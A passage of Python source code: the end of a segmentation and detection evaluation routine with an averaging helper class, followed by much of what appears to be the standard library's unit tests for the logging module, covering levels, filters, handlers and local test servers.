ll_segment_result = (ll_acc_seg.avg,ll_IoU_seg.avg,ll_mIoU_seg.avg)
# print(da_segment_result)
# print(ll_segment_result)
detect_result = np.asarray([mp, mr, map50, map])
# print('mp:{},mr:{},map50:{},map:{}'.format(mp, mr, map50, map))
#print segmet_result
t = [T_inf.avg, T_nms.avg]
return da_segment_result, ll_segment_result, detect_result, losses.avg, maps, t
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count if self.count != 0 else 0
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
